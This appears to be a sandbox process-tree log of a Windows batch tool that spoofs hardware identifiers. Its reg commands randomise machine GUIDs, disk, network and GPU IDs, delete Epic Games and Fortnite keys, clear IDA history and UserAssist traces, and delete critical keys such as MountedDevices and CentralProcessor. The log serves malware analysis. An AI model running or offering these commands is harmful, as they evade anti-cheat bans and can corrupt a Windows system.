- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:3552
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d Apple-21407-27105-3234714492 /f
      4⤵
      Modifies registry key
      PID:2848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:1032
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d Apple-21407-27105-3234714492 /f
      4⤵
      Enumerates system info in registry
      Modifies registry key
      PID:956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:632
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d Apple-21407-27105-3234714492 /f
      4⤵
      Enumerates system info in registry
      Modifies registry key
      PID:3204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
    3⤵
    PID:972
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {Apple-21407-27105-3234714492} /f
      4⤵
      PID:1060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
    3⤵
    PID:4624
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {Apple-21407-27105-3234714492} /f
      4⤵
      Modifies registry key
      PID:2752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:1328
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-21407 /f
      4⤵
      Modifies registry key
      PID:3276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random% /f
    3⤵
    PID:3208
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 21407 /f
      4⤵
      PID:4488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random% /f
    3⤵
    PID:456
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 21407 /f
      4⤵
      Modifies registry key
      PID:1720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:1172
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-21407 /f
      4⤵
      Modifies registry key
      PID:1796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Apple%random%-%random%-%random%-%random%%random%} /f >nul 2>&1
    3⤵
    PID:1992
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {Apple21407-27105-32347-1449227263} /f
      4⤵
      Modifies registry key
      PID:1972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Apple%random%-%random%-%random%-%random%%random%} /f
    3⤵
    PID:1812
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {Apple21410-5086-17443-57874810} /f
      4⤵
      PID:4044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random% /f
    3⤵
    PID:3412
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 21410 /f
      4⤵
      Modifies registry key
      PID:2588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d %random% /f
    3⤵
    PID:5016
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d 21410 /f
      4⤵
      PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d %random% /f
    3⤵
    PID:2616
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d 21410 /f
      4⤵
      Modifies registry key
      PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%-%random%-%random%-%random% /f
    3⤵
    PID:4172
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 21410-5086-17443-5787 /f
      4⤵
      Modifies registry key
      PID:3252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Apple%random%-%random%-%random%-%random% /f
    3⤵
    PID:2856
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d Apple21410-5086-17443-5787 /f
      4⤵
      Modifies registry key
      PID:4400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Apple%random% /f
    3⤵
    PID:3628
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d Apple21410 /f
      4⤵
      Modifies registry key
      PID:1516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d %random% /f
    3⤵
    PID:2024
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d 21410 /f
      4⤵
      Modifies registry key
      PID:4816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d %random% /f
    3⤵
    PID:3864
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d 21410 /f
      4⤵
      PID:3504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Apple%random%-%random%-%random%-%random%} /f
    3⤵
    PID:1056
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {Apple21410-5086-17443-5787} /f
      4⤵
      Modifies registry key
      PID:3744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic" "Games /f
    3⤵
    PID:2740
  - - C:\Windows\system32\reg.exe
      REG delete HKCU\Software\Epic" "Games /f
      4⤵
      Modifies registry key
      PID:1016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic Games /f
    3⤵
    PID:4768
  - - C:\Windows\system32\reg.exe
      REG delete HKCU\Software\Epic Games /f
      4⤵
      PID:4928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic" "Games\Unreal" "Engine\Hardware" "Survey\HardwareSurveyFlags /f
    3⤵
    PID:1748
  - - C:\Windows\system32\reg.exe
      REG delete HKCU\Software\Epic" "Games\Unreal" "Engine\Hardware" "Survey\HardwareSurveyFlags /f
      4⤵
      Modifies registry key
      PID:4392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG delete HKCU\Software\Epic Games\Unreal Engine\Hardware Survey\HardwareSurveyFlags /f
    3⤵
    PID:1560
  - - C:\Windows\system32\reg.exe
      REG delete HKCU\Software\Epic Games\Unreal Engine\Hardware Survey\HardwareSurveyFlags /f
      4⤵
      PID:1384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%-%random%-%random%-%random%%random% /f
    3⤵
    PID:3836
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 21410-5086-17443-57874810 /f
      4⤵
      PID:732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
    3⤵
    PID:4216
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
      4⤵
      Modifies registry key
      PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
    3⤵
    PID:5044
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
      4⤵
      PID:4648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
    3⤵
    PID:5060
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
      4⤵
      Modifies registry key
      PID:5024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCR\com.epicgames.launcher /f
    3⤵
    PID:4872
  - - C:\Windows\system32\reg.exe
      reg delete HKCR\com.epicgames.launcher /f
      4⤵
      PID:1596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    PID:2520
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\MountedDevices /f
      4⤵
      PID:4844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:756
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
      4⤵
      PID:4952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    PID:484
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
      4⤵
      PID:5000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:1424
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
      4⤵
      Modifies registry key
      PID:4440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:3920
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
      4⤵
      Modifies registry key
      PID:2560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
    3⤵
    PID:4408
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
      4⤵
      Modifies registry key
      PID:1908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:2276
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d Apple-21410-5086-174435787 /f
      4⤵
      Modifies registry key
      PID:3988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:444
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d Apple-21410-5086-174435787 /f
      4⤵
      Modifies registry key
      PID:3556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:2268
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple-21410-5086-174435787 /f
      4⤵
      Modifies registry key
      PID:2952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
    3⤵
    PID:4848
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
      4⤵
      Modifies registry key
      PID:3808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:3692
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d Apple-21413-15834-253929850 /f
      4⤵
      Modifies registry key
      PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:624
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d Apple-21413-15834-253929850 /f
      4⤵
      PID:3660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:4224
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d Apple-21413-15834-253929850 /f
      4⤵
      Modifies registry key
      PID:968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    PID:408
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\MountedDevices /f
      4⤵
      PID:488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:396
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
      4⤵
      PID:1896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    PID:3156
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
      4⤵
      Modifies registry key
      PID:4516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:404
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
      4⤵
      Modifies registry key
      PID:4584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:4948
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
      4⤵
      Modifies registry key
      PID:2584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
    3⤵
    PID:4772
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
      4⤵
      Modifies registry key
      PID:1788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:4112
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d 21413158342539298501512414977205692775229095161511713610202 /f
      4⤵
      Modifies registry class
      Modifies registry key
      PID:4644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:2752
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d Apple-21413-15834-253929850 /f
      4⤵
      PID:4624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:3276
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d Apple-21413-15834-253929850 /f
      4⤵
      Modifies registry key
      PID:1328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:4788
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d Apple-21413-15834-253929850 /f
      4⤵
      Modifies registry key
      PID:4488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
    3⤵
    PID:1632
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
      4⤵
      Modifies registry key
      PID:2100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:1156
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d Apple-21413-15834-253929850 /f
      4⤵
      PID:1988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:3240
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d Apple-21413-15834-253929850 /f
      4⤵
      Modifies registry key
      PID:2484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
    3⤵
    PID:2072
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
      4⤵
      Modifies registry key
      PID:3288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
    3⤵
    PID:2596
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
      4⤵
      Modifies registry key
      PID:684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
    3⤵
    PID:2944
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
      4⤵
      PID:3848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
    3⤵
    PID:2360
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
      4⤵
      PID:4668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
    3⤵
    PID:3252
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
      4⤵
      PID:4172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History /f
    3⤵
    PID:4400
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Hex-Rays\IDA\History /f
      4⤵
      Modifies registry key
      PID:2856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
    3⤵
    PID:1516
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
      4⤵
      Modifies registry key
      PID:3628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
    3⤵
    PID:4220
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
      4⤵
      Modifies registry key
      PID:2748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
    3⤵
    PID:2772
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
      4⤵
      PID:856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
    3⤵
    PID:2768
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
      4⤵
      Checks processor information in registry
      Modifies registry key
      PID:3820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\3 /f
    3⤵
    PID:2436
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\3 /f
      4⤵
      Modifies registry key
      PID:392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f
    3⤵
    PID:848
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f
      4⤵
      Modifies registry key
      PID:3724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\8c416c79-d49b-4f01-a467-e56d3aa8234c /f
    3⤵
    PID:4016
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\8c416c79-d49b-4f01-a467-e56d3aa8234c /f
      4⤵
      PID:744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f
    3⤵
    PID:2720
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\WMI\Security\e5cdf199-abfd-11ea-8f7e-a8be27d3e473 /f
      4⤵
      Modifies registry key
      PID:4088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Compatibility32\FortniteLauncher /f
    3⤵
    PID:3540
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Compatibility32\FortniteLauncher /f
      4⤵
      PID:3176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:4332
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 214172658220403211452543918904236812482512839100031698810246 /f
      4⤵
      PID:364
- - C:\Windows\system32\cmd.exe
